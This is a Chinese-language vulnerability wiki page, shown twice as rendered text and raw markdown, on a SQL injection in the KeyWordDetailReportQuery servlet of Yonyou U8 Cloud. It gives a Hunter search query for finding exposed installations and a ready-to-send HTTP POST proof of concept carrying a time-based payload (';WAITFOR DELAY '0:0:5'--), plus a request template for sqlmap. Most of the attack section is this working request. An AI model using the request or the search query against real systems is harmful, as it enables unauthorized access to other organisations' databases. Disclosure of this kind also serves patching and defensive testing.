fofamini-wiki

登录白背景

源码

用友U8 Cloud KeyWordDetailReportQuery存在SQL注入漏洞

一、漏洞简介

用友U8 Cloud是用友公司推出的企业上云数字化平台，为成长型和创新型企业提供全面的云ERP解决方案。然而，该平台中存在一个安全漏洞，涉及KeyWordDetailReportQuery接口对用户输入参数缺乏有效过滤，可能导致SQL注入攻击。攻击者可通过此漏洞未经授权地访问数据库，造成潜在的信息泄露风险。建议尽快修复漏洞，强化输入验证，提升系统安全性。

二、影响版本

用友U8 Cloud

三、资产测绘

hunterapp.name="用友 U8 Cloud"

登录页面

四、漏洞复现

POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

{"reportType":"';WAITFOR DELAY '0:0:5'--","usercode":"18701014496","keyword":[{"keywordPk":"1","keywordValue":"1","keywordIndex":1}]}

sqlmap

POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

{"reportType":"","usercode":"18701014496","keyword":[{"keywordPk":"1","keywordValue":"1","keywordIndex":1}]}

原文: https://www.yuque.com/xiaokp7/ocvun2/bgw5lnx2ttceb352

# 用友U8 Cloud KeyWordDetailReportQuery存在SQL注入漏洞

# 一、漏洞简介
用友U8 Cloud是用友公司推出的企业上云数字化平台，为成长型和创新型企业提供全面的云ERP解决方案。然而，该平台中存在一个安全漏洞，涉及KeyWordDetailReportQuery接口对用户输入参数缺乏有效过滤，可能导致SQL注入攻击。攻击者可通过此漏洞未经授权地访问数据库，造成潜在的信息泄露风险。建议尽快修复漏洞，强化输入验证，提升系统安全性。

# 二、影响版本

- 用友U8 Cloud

# 三、资产测绘

- hunter`app.name="用友 U8 Cloud"`

![image.png](./img/KkdjHln09AlKfEse/1692444362525-121bbed1-c72d-4cad-99db-3e18509417c1-752635.png)

- 登录页面

![image.png](./img/KkdjHln09AlKfEse/1692444381978-7d4ed5bf-a153-47e5-88e6-4dd97953e976-369245.png)

# 四、漏洞复现
```
POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

{"reportType":"';WAITFOR DELAY '0:0:5'--","usercode":"18701014496","keyword":[{"keywordPk":"1","keywordValue":"1","keywordIndex":1}]}
```
![image.png](./img/KkdjHln09AlKfEse/1704701253218-b788191e-96cf-4206-845f-43235299253b-257295.png)
sqlmap
```
POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

{"reportType":"","usercode":"18701014496","keyword":[{"keywordPk":"1","keywordValue":"1","keywordIndex":1}]}
```
![image.png](./img/KkdjHln09AlKfEse/1704701400524-7fd0dc88-8a64-4bf0-837b-6d91db046c05-016357.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bgw5lnx2ttceb352>